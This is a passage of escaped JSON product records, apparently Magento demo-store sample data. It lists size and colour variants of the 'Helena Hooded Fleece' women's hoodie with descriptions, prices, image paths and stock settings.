100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"1119\":{\"sku\":\"WH10-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-S-Blue\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1120\":{\"sku\":\"WH10-S-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-S-Gray\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-s-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh10-gray_alt1.jpg,\\/w\\/h\\/wh10-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh10-gray_alt1.jpg,\\/w\\/h\\/wh10-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Gray\"},\"1121\":{\"sku\":\"WH10-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-S-Yellow\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1122\":{\"sku\":\"WH10-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-M-Blue\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1123\":{\"sku\":\"WH10-M-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-M-Gray\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-m-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh10-gray_alt1.jpg,\\/w\\/h\\/wh10-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh10-gray_alt1.jpg,\\/w\\/h\\/wh10-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Gray\"},\"1124\":{\"sku\":\"WH10-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-M-Yellow\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1125\":{\"sku\":\"WH10-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-L-Blue\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1126\":{\"sku\":\"WH10-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-L-Gray\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh10-gray_alt1.jpg,\\/w\\/h\\/wh10-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh10-gray_alt1.jpg,\\/w\\/h\\/wh10-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},\"1127\":{\"sku\":\"WH10-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-L-Yellow\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 